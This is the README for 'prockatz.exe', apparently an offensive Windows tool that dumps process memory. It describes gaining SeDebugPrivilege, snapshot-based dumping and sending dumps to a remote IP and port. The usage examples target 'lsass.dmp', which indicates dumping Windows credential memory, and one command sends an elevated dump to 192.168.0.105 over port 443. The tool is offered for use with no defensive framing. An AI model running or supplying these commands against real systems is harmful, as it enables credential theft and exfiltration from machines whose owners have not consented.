This tool provides the functionality to create memory dumps of processes on Windows systems. It can handle privileged processes by setting SeDebugPrivilege
, supports snapshot creation for non-invasive dumping, and can send dumps over the network.
- Enable debug Privileges: Gain
SeDebugPrivilege
to handle privileged processes. - Network Transmission: Send process dumps to a specified IP and port.
- Snapshot Creation: Create a snapshot of the process for a non-intrusive dump.
- Support for both PID and Process Name: Specify the target for dumping either by PID or process name.
-h, --help
: Show help message and exits.-v, --version
: Print version information and exits.--pid
: Specify the Process ID to dump. [nargs=0..1] [default: 0]--procname
: Specify the name of the process. [nargs=0..1] [default: ""]--dmp
: Specify the file name to dump the process. [nargs=0..1] [default: ""]--ip
: Specify the IP address to send the dump. [nargs=0..1] [default: ""]--port
: Specify the port to send the dump. [nargs=0..1] [default: ""]--elevate
: Set SeDebugPrivilege to dump privileged processes. [OPTIONAL]--snapshot
: Creates a snapshot of the process before dumping it. [OPTIONAL]
prockatz.exe --pid 1000 --dmp lsass.dmp
prockatz.exe --procname "example.exe" --dmp "lsass.dmp"
prockatz.exe --pid 1000 --dmp lsass.dmp --elevate
prockatz.exe --pid 1000 --ip 192.168.0.105 --port 443 --elevate
prockatz.exe --pid 1000 --dmp lsass.dmp --elevate --snapshot
- Argparse Library: This tool uses the
argparse
library by Ranav for parsing command line arguments. More information can be found at argparse on GitHub.